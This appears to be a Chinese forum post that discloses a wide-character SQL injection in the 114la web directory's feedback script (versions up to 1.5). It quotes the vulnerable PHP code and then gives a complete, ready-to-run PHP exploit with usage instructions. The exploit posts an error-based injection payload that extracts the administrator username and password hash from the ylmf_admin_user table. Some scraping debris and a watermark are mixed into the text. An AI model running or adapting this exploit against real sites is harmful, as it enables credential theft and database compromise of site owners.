图片:qq截图20110726221924.png
漏洞文件feedback/feedback.php
影响版本<=1.5
$username = empty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username']));
$email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : '';
$content = (isset($_POST['content'])) ? trim(iconv('UTF-8', 'GBK', $_POST['content'])) : '';
(empty($content)) ;; $error_msg .= ',意见及建议';
if (!empty($error_msg))
{
throw new Exception($error_msg, 11);
}
$content = htmlspecialchars($content, ENT_QUOTES);
if (strlen($content) > 600 || strlen($content) < 40)
{
throw new Exception('请将您的描述控制在 20 - 300 字,更多内容请您分次提交。', 1);
}
// 验证次数
$old_cookie = (isset($_COOKIE['fdnum'])) ? (int)$_COOKIE['fdnum'] : 0;
if ($old_cookie >= SUBMIT_ONE_DAY)
{
throw new Exception('抱歉,24 小时内您只能提交 ' . SUBMIT_ONE_DAY . ' 次反馈信息。谢谢合作!', 2);
}
$old_cookie++;
if (false === app_db::insert('ylmf_feedback', array('username', 'email', 'content', 'add_time'),
array($username, $email, $content, time())))
{
throw new Exception('抱歉,信息提交失败,请重试。', 1);
}
else
{
// 记录提交次数
if ($old_cookie > SUBMIT_ONE_DAY || !isset($_COOKIE['fdstime']) || $_COOKIE['fdstime'] < 1)
{
setcookie('dfstime', time(), time() + 86400);
setcookie('fdnum', $old_cookie, time() + 86400);
}
else
{
setcookie('fdnum', $old_cookie, time() + 86400 - (time() - $_COOKIE['fdstime']));
}
throw new Exception('<div class="success">提交成功,感谢您的反馈!<a href="'. URL .'/">返回首页
www.atcpu.com</a></div>', 3);
unset($username, $email, $content);
}
复制代码
$username、$email、$content强制转换GBK编码但是均未过滤直接insert 构造UTF8宽字符形成宽字符注入- 低调求发展( \ s; v1 u: u0 f0 r
EXP
<?php
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: oke
2011.04.02
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
print_r($sbcopyright);
die();
}
ob_start();
$url = $argv[1];
$path= $argv[2];
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno) ");
$data = "username=0kee%E7%B8%97';email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#;content=~~~~~this is a test from 0kee security team~~~~~";
fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1 ");
fwrite($sock, "Accept: */* ");
fwrite($sock, "Referer:
http://$url/#M ");
fwrite($sock, "Accept-Language: zh-cn ");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded ");
fwrite($sock, "Accept-Encoding: gzip, deflate ");
fwrite($sock, "User-Agent: Mozilla ");
fwrite($sock, "Host: $url ");
fwrite($sock, "Content-Length: ".strlen($data)." ");
fwrite($sock, "Connection: Keep-Alive ");
fwrite($sock, "Cache-Control: no-cache ");
fwrite($sock, "Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON ");
fwrite($sock, $data);
$headers = "";
while ($str = trim(fgets($sock, 4096)))
$headers .= "$str ";
echo " ";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
if (strpos($body, 'Duplicate entry') !== false) {
preg_match('/Duplicate entry \'(.*)1\'/', $body, $arr);
$result=explode("_",$arr[1]);
print_r("Exploit Success! username:".$result[0]." password:".$result[1]." Good Luck!");
}else{
print_r("Exploit Failed! ");
}
ob_end_flush();
?>
